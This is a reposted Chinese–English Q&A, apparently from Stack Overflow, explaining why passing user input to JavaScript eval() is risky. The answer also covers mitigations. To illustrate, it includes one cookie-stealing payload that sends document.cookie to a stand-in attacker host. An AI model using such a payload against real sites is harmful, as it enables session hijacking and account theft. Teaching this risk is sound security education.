Javascript eval() 这么危险吗? [英] Is Javascript eval() so dangerous?
问题描述
可能的重复:
JavaScript 的 eval() 何时不邪恶?
我正在编写一个脚本,用户必须在其中输入货币金额,一些示例可能是(用户输入 >> 转换为),以美元作为默认货币:
I am writing a script in which users have to write in a currency amount, some examples could be (user input >> converts to), with USD as default currency:
50 >> 50.0 USD
50.5 >> 50.5 USD
50+1 USD >> 51.0 USD
50 GBP >> 50.0 GBP
我想让它尽可能流畅,因此我想使用 JavaScript(它是一个基于 PHP/MySql + JavaScript 的网络应用程序).我想使用正则表达式来过滤输入,通过 eval() 运行它并返回它.
I want to make this as smooth as possible, therefore I want to use JavaScript (it's a web app based on PHP/MySql + JavaScript). I want to use regex to filter the input, run it through eval() and return it.
这是个坏主意吗?我已经阅读了一些关于 eval() 是一个安全问题的主题.我只是不明白如何.用户无论如何都可以轻松运行 JavaScript?
Is this a bad idea? I've read some topics about eval() being a security issue. I just don't see how. A user can easily run JavaScript anyway?
请记住,我将在稍后阶段使用 PHP 验证所有输入服务器端.
Keep in mind that I will validate all input server-side with PHP at a later stage.
推荐答案
您是对的,最终用户无论如何都可以通过浏览器的开发人员控制台轻松执行任意 JavaScript(我一直这样做).您需要担心的是,攻击者会劫持您的功能,并为自己的目的使用 eval.
You're right that an end user can easily execute arbitrary JavaScript anyway via the browser's developer console (I do this all the time). What you have to worry about is an attacker hijacking your feature that uses eval for his own ends.
eval 通常被认为是危险的原因是因为不受信任的代码很容易潜入其中.考虑一个允许您通过查询字符串指定输入的页面,其中输入框预先填充了查询字符串中的值.
The reason eval is generally considered dangerous is because it is very easy for untrusted code to sneak in. Consider a page that allows you specify input via query string, where the input box is prepopulated with the value in the query string.
攻击者可以传播包含窃取用户登录 cookie 代码的链接:
An attacker could spread a link that contains code which steals a user's login cookie:
/some/url?amount=var i=new Image();i.src='http://badguy.ru/x?' + document.cookie;
(显然需要正确的 URL 编码;这是为了说明.)
(Obviously proper URL encoding is required; this is for illustration.)
或者,当验证失败时,您的 PHP 脚本可能会将发布的数据回显到您的表单中.攻击者可以创建一个特制的表单,使用相同的 cookie 窃取代码发布到您的表单.
Or, perhaps your PHP script echos posted data back into your form when validation fails. An attacker could create a specially crafted form that posts to your form with the same cookie-stealing code.
这些攻击中的每一种都可以通过使用 httpOnly cookie(以防止登录 cookie 被盗)或确保数据经过清理来缓解.但关键是这甚至还没有接近一份详尽的清单,说明事情可能会如何出错.例如,注入的脚本仍然可以在金额字段中插入 1000 并尝试将该金额转入攻击者的帐户(如果这是汇款页面).
Each of these attacks can be mitigated by using httpOnly cookies (to prevent stolen login cookies) or making sure that data is sanitized – but the point is this isn't even close to an exhaustive list of how things can go wrong. For example, an injected script could still insert 1000 in the amount field and try to transfer that amount to the attacker's account (if this is a money transfer page).
即使您使用正则表达式来清理输入这一事实也不一定能保护您:编写任意 JavaScript 是可能的 完全带括号!
Even given the fact that you're using a regex to sanitize input doesn't necessarily protect you: it's possible to write arbitrary JavaScript entirely with brackets!
所以最重要的是,如果您可以绝对确定输入进入您的文本字段的唯一方式是通过用户输入,那么您就可以了:用户没有获得任何他们无法通过控制台执行的操作.但是,如果攻击者可以以某种方式将他们自己的数据放入该字段,eval可能会使您暴露在漏洞中.
So the bottom line is that if you can make absolutely sure that the only way input makes its way into your text field is via user input, you're fine: the user hasn't gained anything they wouldn't be able to do otherwise via the console. However, if an attacker can somehow get their own data into that field, evaling it may expose you to a vulnerability.
另见:
这篇关于Javascript eval() 这么危险吗?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
